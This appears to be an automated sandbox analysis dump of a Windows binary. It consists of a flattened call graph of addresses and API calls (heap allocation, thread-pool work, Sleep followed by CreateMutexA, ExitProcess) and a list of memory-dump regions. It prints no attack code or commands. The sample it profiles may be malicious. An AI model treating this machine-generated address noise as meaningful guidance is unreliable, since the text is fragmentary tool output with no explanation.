9d6863 11400->11402 11413 9d69cc 11401->11413 11404 9d686a 11402->11404 11406 9d6889 __cftof 11402->11406 11412 9d6853 11404->11412 11417 9d69e6 11404->11417 11407 9d69e6 RtlAllocateHeap 11406->11407 11409 9d689f __cftof 11406->11409 11407->11409 11408 9d75c0 __dosmaperr RtlAllocateHeap 11410 9d68ab 11408->11410 11409->11408 11409->11412 11411 9d75f6 __dosmaperr RtlAllocateHeap 11410->11411 11411->11412 11412->11377 11412->11378 11414 9d69df 11413->11414 11415 9d69d7 11413->11415 11414->11412 11416 9dadf5 ___free_lconv_mon RtlAllocateHeap 11415->11416 11416->11414 11418 9d69cc RtlAllocateHeap 11417->11418 11419 9d69f4 11418->11419 11422 9d6a25 11419->11422 11423 9db04b __cftof RtlAllocateHeap 11422->11423 11424 9d6a05 11423->11424 11424->11412 11468 9a3440 11473 9a2b30 11468->11473 11470 9a344f Concurrency::cancel_current_task 11471 9d38af ___std_exception_copy RtlAllocateHeap 11470->11471 11472 9a3483 11471->11472 11474 9d38af ___std_exception_copy RtlAllocateHeap 11473->11474 11475 9a2b68 std::future_error::future_error 11474->11475 11475->11470 11476 9a3840 11477 9a38f6 11476->11477 11479 9a385f 11476->11479 11478 9a3920 11486 9b91e0 11478->11486 11479->11477 11479->11478 11482 9a391b 11479->11482 11485 9a38cd shared_ptr 11479->11485 11481 9b7d50 RtlAllocateHeap 11481->11477 11484 9d6c6a RtlAllocateHeap 11482->11484 11483 9a3925 11484->11478 11485->11481 11487 9bc1b9 RtlAllocateHeap 11486->11487 11488 9b91ea 11487->11488 11488->11483 11489 9a3c47 11490 9a3c51 11489->11490 11492 9a32d0 6 API calls 11490->11492 11493 9a3c5f 11490->11493 11491 9a3c68 11492->11493 11493->11491 11494 9a3810 4 API calls 11493->11494 11495 9a3cdb 11494->11495 11496 9b7d50 RtlAllocateHeap 11495->11496 11497 9a3d52 11495->11497 11496->11497 11498 9bd3e2 RtlAllocateHeap 11497->11498 11499 9a3d84 11498->11499 11500 9b7d50 RtlAllocateHeap 11499->11500 11502 9a3e03 11499->11502 11500->11502 11501 9a3e9b shared_ptr 11502->11501 11503 9d6c6a RtlAllocateHeap 11502->11503 11504 9a3ec1 11503->11504 11514 9acc79 11515 9acc84 shared_ptr 11514->11515 11516 9accda shared_ptr std::future_error::future_error 11515->11516 11517 9d6c6a RtlAllocateHeap 11515->11517 11518 9ace36 11517->11518 11519 9b7a00 RtlAllocateHeap 11518->11519 11520 9ace92 11519->11520 11521 9a5c10 4 API calls 11520->11521 11522 9ace9d 11521->11522 11524 9aca70 11522->11524 11525 9acadd 11524->11525 11527 9b7a00 RtlAllocateHeap 11525->11527 11529 9acc87 11525->11529 11526 9accda shared_ptr std::future_error::future_error 11528 9accee 11527->11528 11530 9a5c10 4 API calls 11528->11530 11529->11526 11531 9d6c6a RtlAllocateHeap 11529->11531 11532 9accf9 11530->11532 11533 9ace36 11531->11533 11544 9a9030 11532->11544 11535 9b7a00 RtlAllocateHeap 11533->11535 11537 9ace92 11535->11537 11536 9acd0d 11538 9b8220 RtlAllocateHeap 11536->11538 11539 9a5c10 4 API calls 11537->11539 11540 9acd1f 11538->11540 11541 9ace9d 11539->11541 11543 9b8f40 RtlAllocateHeap 11540->11543 11542 9aca70 4 API calls 11541->11542 11543->11529 11545 9a907f 11544->11545 11546 9b7a00 RtlAllocateHeap 11545->11546 11547 9a908f 11546->11547 11548 9a5c10 4 API calls 11547->11548 11549 9a909a 11548->11549 11550 9b80c0 RtlAllocateHeap 11549->11550 11551 9a90ec 11550->11551 11552 9b8220 RtlAllocateHeap 11551->11552 11554 9a90fe shared_ptr 11552->11554 11553 9a917e shared_ptr std::future_error::future_error 11553->11536 11554->11553 11555 9d6c6a RtlAllocateHeap 11554->11555 11556 9a91aa 11555->11556 11566 9a4276 11567 9a2410 5 API calls 11566->11567 11568 9a427f 11567->11568 11569 9a3ce0 RtlAllocateHeap 11568->11569 11570 9a428f 11569->11570 11611 9a3f9f 11612 9a3fad 11611->11612 11616 9a3fc5 11611->11616 11613 9a2410 5 API calls 11612->11613 11614 9a3fb6 11613->11614 11615 9a3ce0 RtlAllocateHeap 11614->11615 11615->11616 11620 9a2b90 11621 9a2bce 11620->11621 11624 9bb7fb 11621->11624 11623 9a2bdb shared_ptr std::future_error::future_error 11625 9bb817 11624->11625 11626 9bb807 11624->11626 11625->11623 11626->11625 11628 9bca78 11626->11628 11629 9bca8d TpReleaseWork 11628->11629 11629->11625 11650 9a8980 11651 9a8aea 11650->11651 11658 9a89d8 shared_ptr 11650->11658 11652 9b7a00 RtlAllocateHeap 11652->11658 11653 9a5c10 4 API calls 11653->11658 11654 9a8b20 11656 9b8200 RtlAllocateHeap 11654->11656 11655 9b80c0 RtlAllocateHeap 11655->11658 11657 9a8b25 11656->11657 11659 9d6c6a RtlAllocateHeap 11657->11659 11658->11651 11658->11652 11658->11653 11658->11654 11658->11655 11658->11657 11660 9a8b2a 11659->11660 11684 9d8bbe 11687 9d8868 11684->11687 11688 9d868d RtlAllocateHeap 11687->11688 11692 9d887a 11688->11692 11689 9d88b3 11690 9d690a __cftof 4 API calls 11689->11690 11697 9d88bf 11690->11697 11691 9d888f 11693 9d75f6 __dosmaperr RtlAllocateHeap 11691->11693 11692->11689 11692->11691 11704 9d889f 11692->11704 11694 9d8894 11693->11694 11696 9d6c5a __cftof RtlAllocateHeap 11694->11696 11695 9d6d52 4 API calls 11695->11697 11696->11704 11697->11695 11699 9d88ee 11697->11699 11698 9d8958 11700 9d8a8d RtlAllocateHeap 11698->11700 11699->11698 11705 9d8a8d 11699->11705 11702 9d8a20 11700->11702 11703 9d75f6 __dosmaperr RtlAllocateHeap 11702->11703 11702->11704 11703->11704 11706 9d8ab2 11705->11706 11707 9d8a9e 11705->11707 11706->11698 11707->11706 11708 9d75f6 __dosmaperr RtlAllocateHeap 11707->11708 11709 9d8aa7 11708->11709 11710 9d6c5a __cftof RtlAllocateHeap 11709->11710 11710->11706 11715 9d67b7 11716 9d67c3 __dosmaperr 11715->11716 11717 9d67cd 11716->11717 11721 9d67e2 11716->11721 11718 9d75f6 __dosmaperr RtlAllocateHeap 11717->11718 11719 9d67d2 11718->11719 11720 9d6c5a __cftof RtlAllocateHeap 11719->11720 11723 9d67dd 11720->11723 11721->11723 11724 9d6740 11721->11724 11725 9d674d 11724->11725 11726 9d6762 11724->11726 11727 9d75f6 __dosmaperr RtlAllocateHeap 11725->11727 11730 9d675d 11726->11730 11740 9da038 11726->11740 11729 9d6752 11727->11729 11732 9d6c5a __cftof RtlAllocateHeap 11729->11732 11730->11723 11732->11730 11736 9d6785 11757 9daebb 11736->11757 11739 9dadf5 ___free_lconv_mon RtlAllocateHeap 11739->11730 11741 9da050 11740->11741 11745 9d6777 11740->11745 11742 9dafe4 RtlAllocateHeap 11741->11742 11741->11745 11743 9da06e 11742->11743 11772 9e0439 11743->11772 11746 9db00b 11745->11746 11747 9d677f 11746->11747 11748 9db022 11746->11748 11750 9dafe4 11747->11750 11748->11747 11749 9dadf5 ___free_lconv_mon RtlAllocateHeap 11748->11749 11749->11747 11751 9db005 11750->11751 11752 9daff0 11750->11752 11751->11736 11753 9d75f6 __dosmaperr RtlAllocateHeap 11752->11753 11754 9daff5 11753->11754 11755 9d6c5a __cftof RtlAllocateHeap 11754->11755 11756 9db000 11755->11756 11756->11736 11758 9daecc 11757->11758 11759 9daee1 11757->11759 11761 9d75e3 __dosmaperr RtlAllocateHeap 11758->11761 11760 9daf2a 11759->11760 11764 9daf08 11759->11764 11762 9d75e3 __dosmaperr RtlAllocateHeap 11760->11762 11763 9daed1 11761->11763 11765 9daf2f 11762->11765 11766 9d75f6 __dosmaperr RtlAllocateHeap 11763->11766 11790 9dae2f 11764->11790 11768 9d75f6 __dosmaperr RtlAllocateHeap 11765->11768 11769 9d678b 11766->11769 11770 9daf37 11768->11770 11769->11730 11769->11739 11771 9d6c5a __cftof RtlAllocateHeap 11770->11771 11771->11769 11773 9e0445 __dosmaperr 11772->11773 11774 9e044d 11773->11774 11776 9e0465 11773->11776 11775 9d75e3 __dosmaperr RtlAllocateHeap 11774->11775 11778 9e0452 11775->11778 11777 9e0500 11776->11777 11784 9e0497 11776->11784 11779 9d75e3 __dosmaperr RtlAllocateHeap 11777->11779 11781 9d75f6 __dosmaperr RtlAllocateHeap 11778->11781 11780 9e0505 11779->11780 11782 9d75f6 __dosmaperr RtlAllocateHeap 11780->11782 11789 9e045a 11781->11789 11783 9e050d 11782->11783 11785 9d6c5a __cftof RtlAllocateHeap 11783->11785 11786 9d75f6 __dosmaperr RtlAllocateHeap 11784->11786 11784->11789 11785->11789 11787 9e04be 11786->11787 11788 9d75e3 __dosmaperr RtlAllocateHeap 11787->11788 11788->11789 11789->11745 11791 9dae3b __dosmaperr 11790->11791 11792 9dae7b 11791->11792 11793 9dae70 11791->11793 11795 9d75f6 __dosmaperr RtlAllocateHeap 11792->11795 11797 9daf48 11793->11797 11796 9dae76 11795->11796 11796->11769 11808 9dc0de 11797->11808 11799 9daf5e 11804 9d75c0 __dosmaperr RtlAllocateHeap 11799->11804 11806 9dafd8 11799->11806 11800 9daf58 11800->11799 11801 9dc0de RtlAllocateHeap 11800->11801 11807 9daf90 11800->11807 11803 9daf87 11801->11803 11802 9dc0de RtlAllocateHeap 11802->11799 11805 9dc0de RtlAllocateHeap 11803->11805 11804->11806 11805->11807 11806->11796 11807->11799 11807->11802 11809 9dc0eb 11808->11809 11810 9dc100 11808->11810 11811 9d75e3 __dosmaperr RtlAllocateHeap 11809->11811 11813 9d75e3 __dosmaperr RtlAllocateHeap 11810->11813 11815 9dc125 11810->11815 11812 9dc0f0 11811->11812 11814 9d75f6 __dosmaperr RtlAllocateHeap 11812->11814 11816 9dc130 11813->11816 11817 9dc0f8 11814->11817 11815->11800 11818 9d75f6 __dosmaperr RtlAllocateHeap 11816->11818 11817->11800 11819 9dc138 11818->11819 11820 9d6c5a __cftof RtlAllocateHeap 11819->11820 11820->11817 11821 9ab7b1 11822 9ab7be 11821->11822 11823 9b7a00 RtlAllocateHeap 11822->11823 11824 9ab7f3 11823->11824 11825 9b7a00 RtlAllocateHeap 11824->11825 11826 9ab80b 11825->11826 11827 9b7a00 RtlAllocateHeap 11826->11827 11828 9ab823 11827->11828 11829 9b7a00 RtlAllocateHeap 11828->11829 11830 9ab835 11829->11830 11831 9a6db5 11832 9a6dc2 11831->11832 11833 9a6dca 11832->11833 11834 9a6df5 11832->11834 11835 9b80c0 RtlAllocateHeap 11833->11835 11836 9b80c0 RtlAllocateHeap 11834->11836 11837 9a6deb shared_ptr 11835->11837 11836->11837 11838 9a6ec1 shared_ptr 11837->11838 11839 9d6c6a RtlAllocateHeap 11837->11839 11840 9a6ee3 11839->11840 11890 9a9ba5 11891 9a9ba7 11890->11891 11892 9b7a00 RtlAllocateHeap 11891->11892 11893 9a9ca9 11892->11893 11894 9a5c10 4 API calls 11893->11894 11895 9a9cb1 11894->11895 11896 9a8b30 4 API calls 11895->11896 11897 9a9cc2 11896->11897 11898 9b8220 RtlAllocateHeap 11897->11898 11899 9a9cd1 11898->11899 11900 9a87d0 11901 9a88d3 11900->11901 11909 9a8819 shared_ptr 11900->11909 11902 9b80c0 RtlAllocateHeap 11901->11902 11908 9a8923 11902->11908 11903 9a896c 11906 9b8200 RtlAllocateHeap 11903->11906 11904 9a8949 shared_ptr 11905 9b80c0 RtlAllocateHeap 11905->11909 11907 9a8971 11906->11907 11908->11904 11910 9d6c6a RtlAllocateHeap 11908->11910 11909->11901 11909->11903 11909->11905 11909->11908 11910->11903 11958 9a21c0 11959 9a21cb 11958->11959 11960 9a21d0 11958->11960 11961 9a21d4 11960->11961 11965 9a21ec __cftof 11960->11965 11962 9d75f6 __dosmaperr RtlAllocateHeap 11961->11962 11963 9a21d9 11962->11963 11966 9d6c5a __cftof RtlAllocateHeap 11963->11966 11964 9a21fc __cftof 11965->11964 11967 9a223a 11965->11967 11968 9a2221 11965->11968 11969 9a21e4 11966->11969 11971 9a2231 11967->11971 11973 9d75f6 __dosmaperr RtlAllocateHeap 11967->11973 11970 9d75f6 __dosmaperr RtlAllocateHeap 11968->11970 11972 9a2226 11970->11972 11974 9d6c5a __cftof RtlAllocateHeap 11972->11974 11975 9a2247 11973->11975 11974->11971 11976 9d6c5a __cftof RtlAllocateHeap 11975->11976 11977 9a2252 11976->11977 11978 9b79c0 11979 9b79e0 11978->11979 11979->11979 11980 9b80c0 RtlAllocateHeap 11979->11980 11981 9b79f2 11980->11981 11982 9b83c0 11983 9b7760 RtlAllocateHeap 11982->11983 11984 9b8439 11983->11984 11985 9b8f40 RtlAllocateHeap 11984->11985 11986 9b8454 11984->11986 11985->11986 11987 9b8f40 RtlAllocateHeap 11986->11987 11989 9b84a8 11986->11989 11988 9b84ee 11987->11988 11990 9a55f0 11991 9a5610 11990->11991 11992 9a22c0 4 API calls 11991->11992 11993 9a5710 std::future_error::future_error 11991->11993 11992->11991 11994 9a43f0 11995 9bbedf InitOnceExecuteOnce 11994->11995 11996 9a440a 11995->11996 11997 9a4411 11996->11997 11998 9d6cbb 4 API calls 11996->11998 11999 9a4424 11998->11999 12040 9a3fe0 12041 9a4022 12040->12041 12042 9a408c 12041->12042 12043 9a40d2 12041->12043 12046 9a4035 std::future_error::future_error 12041->12046 12047 9a35e0 12042->12047 12058 9a3ee0 12043->12058 12048 9bd3e2 RtlAllocateHeap 12047->12048 12049 9a3616 12048->12049 12050 9a364e 12049->12050 12051 9a3691 12049->12051 12054 9bc17c Concurrency::cancel_current_task RtlAllocateHeap 12050->12054 12057 9a3663 shared_ptr std::future_error::future_error 12050->12057 12064 9a2ce0 12051->12064 12053 9a369e 12053->12057 12073 9a2c00 12053->12073 12055 9a3720 12054->12055 12055->12046 12057->12046 12059 9a3f1e 12058->12059 12061 9a3f48 12058->12061 12059->12046 12060 9a3f58 12060->12046 12061->12060 12062 9a2c00 4 API calls 12061->12062 12063 9a3f7f 12062->12063 12063->12046 12065 9a2d1d 12064->12065 12066 9bbedf InitOnceExecuteOnce 12065->12066 12067 9a2d46 12066->12067 12068 9a2d51 std::future_error::future_error 12067->12068 12069 9a2d88 12067->12069 12083 9bbef7 12067->12083 12068->12053 12071 9a2440 4 API calls 12069->12071 12072 9a2d9b 12071->12072 12072->12053 12074 9bd3e2 RtlAllocateHeap 12073->12074 12075 9a2c0e 12074->12075 12108 9bb847 12075->12108 12077 9a2c42 12078 9a2c49 12077->12078 12114 9a2c80 12077->12114 12078->12057 12080 9a2c58 12117 9a2560 12080->12117 12082 9a2c65 Concurrency::cancel_current_task 12084 9bbf03 12083->12084 12092 9a2900 12084->12092 12086 9bbf23 Concurrency::cancel_current_task 12087 9bbf6a 12086->12087 12088 9bbf73 12086->12088 12102 9bbe7f 12087->12102 12090 9a2ae0 5 API calls 12088->12090 12091 9bbf6f 12090->12091 12091->12069 12093 9b80c0 RtlAllocateHeap 12092->12093 12094 9a294f 12093->12094 12095 9a26b0 RtlAllocateHeap 12094->12095 12097 9a2967 12095->12097 12096 9a298d shared_ptr 12096->12086 12097->12096 12098 9d6c6a RtlAllocateHeap 12097->12098 12099 9a29b6 12098->12099 12100 9d38af ___std_exception_copy RtlAllocateHeap 12099->12100 12101 9a29e4 12100->12101 12101->12086 12103 9bcc31 InitOnceExecuteOnce 12102->12103 12104 9bbe97 12103->12104 12105 9bbe9e 12104->12105 12106 9d6cbb 4 API calls 12104->12106 12105->12091 12107 9bbea7 12106->12107 12107->12091 12109 9bb854 12108->12109 12113 9bb873 Concurrency::details::_Reschedule_chore 12108->12113 12120 9bcb77 12109->12120 12111 9bb864 12111->12113 12122 9bb81e 12111->12122 12113->12077 12115 9bb7fb TpReleaseWork 12114->12115 12116 9a2cb2 shared_ptr 12115->12116 12116->12080 12118 9d38af ___std_exception_copy RtlAllocateHeap 12117->12118 12119 9a2597 std::future_error::future_error 12118->12119 12119->12082 12121 9bcb92 CreateThreadpoolWork 12120->12121 12121->12111 12123 9bb827 Concurrency::details::_Reschedule_chore 12122->12123 12126 9bcdcc 12123->12126 12125 9bb841 12125->12113 12127 9bcde1 TpPostWork 12126->12127 12127->12125 12128 9b8de0 12129 9b8f2f 12128->12129 12130 9b8e05 12128->12130 12131 9b9270 RtlAllocateHeap 12129->12131 12134 9b8e4c 12130->12134 12135 9b8e76 12130->12135 12132 9b8f34 12131->12132 12133 9a2480 RtlAllocateHeap 12132->12133 12137 9b8e5d __cftof 12133->12137 12134->12132 12136 9b8e57 12134->12136 12135->12137 12140 9bd3e2 RtlAllocateHeap 12135->12140 12139 9bd3e2 RtlAllocateHeap 12136->12139 12138 9d6c6a RtlAllocateHeap 12137->12138 12142 9b8eed shared_ptr __cftof 12137->12142 12141 9b8f3e 12138->12141 12139->12137 12140->12137 12143 9b85e0 12144 9b85f6 12143->12144 12144->12144 12145 9b8f40 RtlAllocateHeap 12144->12145 12146 9b860b 12144->12146 12145->12146 12147 9a211c 12148 9a2126 12147->12148 12149 9bd64e RtlAllocateHeap 12148->12149 12150 9a2132 12149->12150 12151 9bd111 12152 9bd122 12151->12152 12154 9bd12a 12152->12154 12155 9bd199 12152->12155 12156 9bd1a7 SleepConditionVariableCS 12155->12156 12158 9bd1c0 12155->12158 12156->12158 12158->12152 12162 9a2b10 12163 9a2b1a 12162->12163 12164 9a2b1c 12162->12164 12165 9bc26a 5 API calls 12164->12165 12166 9a2b22 12165->12166 12167 9b8510 12168 9b855f 12167->12168 12171 9b856c 12167->12171 12173 9b9d00 12168->12173 12170 9b85c4 12171->12170 12194 9ba060 12171->12194 12174 9b9e31 12173->12174 12178 9b9d25 12173->12178 12175 9b9270 RtlAllocateHeap 12174->12175 12186 9b9d8b __cftof 12175->12186 12176 9d6c6a RtlAllocateHeap 12185 9b9e3b 12176->12185 12177 9b9e2c 12179 9a2480 RtlAllocateHeap 12177->12179 12178->12177 12180 9b9d7a 12178->12180 12181 9b9da1 12178->12181 12179->12174 12180->12177 12182 9b9d85 12180->12182 12183 9bd3e2 RtlAllocateHeap 12181->12183 12181->12186 12184 9bd3e2 RtlAllocateHeap 12182->12184 12183->12186 12184->12186 12187 9b9e6a shared_ptr 12185->12187 12188 9d6c6a RtlAllocateHeap 12185->12188 12186->12176 12189 9b9dfc shared_ptr __cftof 12186->12189 12187->12171 12190 9b9e8e 12188->12190 12189->12171 12191 9b9ec0 shared_ptr 12190->12191 12192 9d6c6a RtlAllocateHeap 12190->12192 12191->12171 12193 9b9ee6 12192->12193 12195 9ba1b1 12194->12195 12197 9ba083 12194->12197 12196 9b9270 RtlAllocateHeap 12195->12196 12207 9ba0e4 __cftof 12196->12207 12198 9ba1ac 12197->12198 12200 9ba0fd 12197->12200 12201 9ba0d3 12197->12201 12202 9a2480 RtlAllocateHeap 12198->12202 12199 9d6c6a RtlAllocateHeap 12206 9ba1bb shared_ptr 12199->12206 12205 9bd3e2 RtlAllocateHeap 12200->12205 12200->12207 12201->12198 12203 9ba0de 12201->12203 12202->12195 12204 9bd3e2 RtlAllocateHeap 12203->12204 12204->12207 12205->12207 12206->12171 12207->12199 12208 9ba16c shared_ptr __cftof 12207->12208 12208->12171 12227 9a4300 12228 9a432e 12227->12228 12231 9a4359 shared_ptr 12227->12231 12229 9d6c6a RtlAllocateHeap 12228->12229 12228->12231 12230 9a43eb 12229->12230 12265 9a6535 12267 9a6549 shared_ptr 12265->12267 12266 9d6c6a RtlAllocateHeap 12269 9a65dc 12266->12269 12267->12266 12268 9a65b1 shared_ptr std::future_error::future_error 12267->12268 12270 9b7a00 RtlAllocateHeap 12269->12270 12271 9a66a6 12270->12271 12272 9a5c10 4 API calls 12271->12272 12273 9a66ac 12272->12273 12274 9a5c10 4 API calls 12273->12274 12275 9a66b1 12274->12275 12276 9a22c0 4 API calls 12275->12276 12277 9a66c9 shared_ptr 12276->12277 12278 9b7a00 RtlAllocateHeap 12277->12278 12279 9a6732 12278->12279 12280 9a5c10 4 API calls 12279->12280 12281 9a673d 12280->12281 12282 9a22c0 4 API calls 12281->12282 12291 9a6757 shared_ptr 12282->12291 12283 9a6852 12284 9b80c0 RtlAllocateHeap 12283->12284 12286 9a689c 12284->12286 12285 9b7a00 RtlAllocateHeap 12285->12291 12287 9b80c0 RtlAllocateHeap 12286->12287 12290 9a68e3 shared_ptr std::future_error::future_error 12287->12290 12288 9a5c10 4 API calls 12288->12291 12289 9a22c0 4 API calls 12289->12291 12291->12283 12291->12285 12291->12288 12291->12289 12292 9d6729 12295 9d6672 12292->12295 12294 9d673b 12298 9d667e __dosmaperr 12295->12298 12296 9d6685 12297 9d75f6 __dosmaperr RtlAllocateHeap 12296->12297 12299 9d668a 12297->12299 12298->12296 12300 9d66a5 12298->12300 12301 9d6c5a __cftof RtlAllocateHeap 12299->12301 12302 9d66aa 12300->12302 12303 9d66b7 12300->12303 12304 9d6695 12301->12304 12305 9d75f6 __dosmaperr RtlAllocateHeap 12302->12305 12309 9da8c3 12303->12309 12304->12294 12305->12304 12307 9d66c0 12307->12304 12308 9d75f6 __dosmaperr RtlAllocateHeap 12307->12308 12308->12304 12310 9da8cf __dosmaperr 12309->12310 12313 9da967 12310->12313 12312 9da8ea 12312->12307 12315 9da98a 12313->12315 12314 9dd82f __dosmaperr RtlAllocateHeap 12316 9da9eb 12314->12316 12315->12314 12318 9da9d0 12315->12318 12317 9dadf5 ___free_lconv_mon RtlAllocateHeap 12316->12317 12317->12318 12318->12312 12324 9a4120 12325 9a416a 12324->12325 12326 9a41f6 12325->12326 12327 9a41a6 12325->12327 12331 9bb6be 12326->12331 12328 9a3ee0 4 API calls 12327->12328 12330 9a41b2 std::future_error::future_error 12328->12330 12332 9bb6ca 12331->12332 12335 9b75a0 12332->12335 12336 9b75ab Concurrency::cancel_current_task 12335->12336 12337 9bc0e9 std::invalid_argument::invalid_argument RtlAllocateHeap 12336->12337 12338 9bc1aa Concurrency::cancel_current_task 12337->12338 12374 9b8320 12375 9b8339 12374->12375 12376 9b834d 12375->12376 12377 9b8f40 RtlAllocateHeap 12375->12377 12377->12376 12378 9a215a 12383 9bc6fc 12378->12383 12381 9bd64e RtlAllocateHeap 12382 9a216e 12381->12382 12384 9bc70c 12383->12384 12385 9a2164 12383->12385 12384->12385 12387 9bcfbe 12384->12387 12385->12381 12388 9bccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 12387->12388 12389 9bcfd0 12388->12389 12389->12384 12402 9aa54d 12403 9aa555 shared_ptr 12402->12403 12404 9aa944 12403->12404 12405 9aa628 shared_ptr 12403->12405 12406 9d6c6a RtlAllocateHeap 12404->12406 12409 9b80c0 RtlAllocateHeap 12405->12409 12407 9aa949 12406->12407 12408 9d6c6a RtlAllocateHeap 12407->12408 12410 9aa94e 12408->12410 12411 9aa903 12409->12411 12412 9d6c6a RtlAllocateHeap 12410->12412 12413 9aa953 Sleep CreateMutexA 12412->12413 12414 9aa98e 12413->12414 12455 9a9f44 12456 9a9f4c shared_ptr 12455->12456 12457 9aa92b 12456->12457 12460 9aa01f shared_ptr 12456->12460 12458 9aa953 Sleep CreateMutexA 12457->12458 12459 9d6c6a RtlAllocateHeap 12457->12459 12461 9aa98e 12458->12461 12459->12458 12462 9b80c0 RtlAllocateHeap 12460->12462 12463 9aa903 12462->12463 12464 9a3970 12465 9bc68b __Mtx_init_in_situ 2 API calls 12464->12465 12466 9a39a7 12465->12466 12467 9bc68b __Mtx_init_in_situ 2 API calls 12466->12467 12468 9a39e6 12467->12468 12469 9a2170 12470 9bc6fc InitializeCriticalSectionEx 12469->12470 12471 9a217a 12470->12471 12472 9bd64e RtlAllocateHeap 12471->12472 12473 9a2184 12472->12473 12474 9a3770 12475 9a379b 12474->12475 12476 9a37cd shared_ptr 12475->12476 12477 9d6c6a RtlAllocateHeap 12475->12477 12478 9a380f 12477->12478 12479 9a5f76 12481 9a5f81 shared_ptr 12479->12481 12480 9a5ffe shared_ptr std::future_error::future_error 12481->12480 12482 9d6c6a RtlAllocateHeap 12481->12482 12483 9a601b 12482->12483 12484 9b80c0 RtlAllocateHeap 12483->12484 12485 9a6089 12484->12485 12486 9b80c0 RtlAllocateHeap 12485->12486 12487 9a60bd 12486->12487 12488 9b80c0 RtlAllocateHeap 12487->12488 12489 9a60ee 12488->12489 12490 9b80c0 RtlAllocateHeap 12489->12490 12491 9a611f 12490->12491 12492 9b80c0 RtlAllocateHeap 12491->12492 12494 9a6150 12492->12494 12493 9a65b1 shared_ptr std::future_error::future_error 12494->12493 12495 9d6c6a RtlAllocateHeap 12494->12495 12496 9a65dc 12495->12496 12497 9b7a00 RtlAllocateHeap 12496->12497 12498 9a66a6 12497->12498 12499 9a5c10 4 API calls 12498->12499 12500 9a66ac 12499->12500 12501 9a5c10 4 API calls 12500->12501 12502 9a66b1 12501->12502 12503 9a22c0 4 API calls 12502->12503 12504 9a66c9 shared_ptr 12503->12504 12505 9b7a00 RtlAllocateHeap 12504->12505 12506 9a6732 12505->12506 12507 9a5c10 4 API calls 12506->12507 12508 9a673d 12507->12508 12509 9a22c0 4 API calls 12508->12509 12516 9a6757 shared_ptr 12509->12516 12510 9a6852 12511 9b80c0 RtlAllocateHeap 12510->12511 12513 9a689c 12511->12513 12512 9b7a00 RtlAllocateHeap 12512->12516 12514 9b80c0 RtlAllocateHeap 12513->12514 12518 9a68e3 shared_ptr std::future_error::future_error 12514->12518 12515 9a5c10 4 API calls 12515->12516 12516->12510 12516->12512 12516->12515 12517 9a22c0 4 API calls 12516->12517 12517->12516

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 367 9d652b-9d6538 call 9da302 370 9d655a-9d656c call 9d656d ExitProcess 367->370 371 9d653a-9d6548 GetPEB 367->371 371->370 373 9d654a-9d6559 371->373 373->370
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,009D652A,?,?,?,?,?,009D7661), ref: 009D6566
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790974553.00000000009A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1790996035.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791067167.0000000000A09000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791090928.0000000000A0B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791115091.0000000000A15000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791135228.0000000000A16000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791158600.0000000000A17000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791284604.0000000000B71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791307160.0000000000B73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791412229.0000000000B9C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791505830.0000000000B9D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791548713.0000000000B9E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791584418.0000000000B9F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791648758.0000000000BA0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791679936.0000000000BA2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791787783.0000000000BB4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791811526.0000000000BB5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791885454.0000000000BC4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1791991438.0000000000BC5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792012579.0000000000BC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792035923.0000000000BC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792055022.0000000000BD0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpDownload File
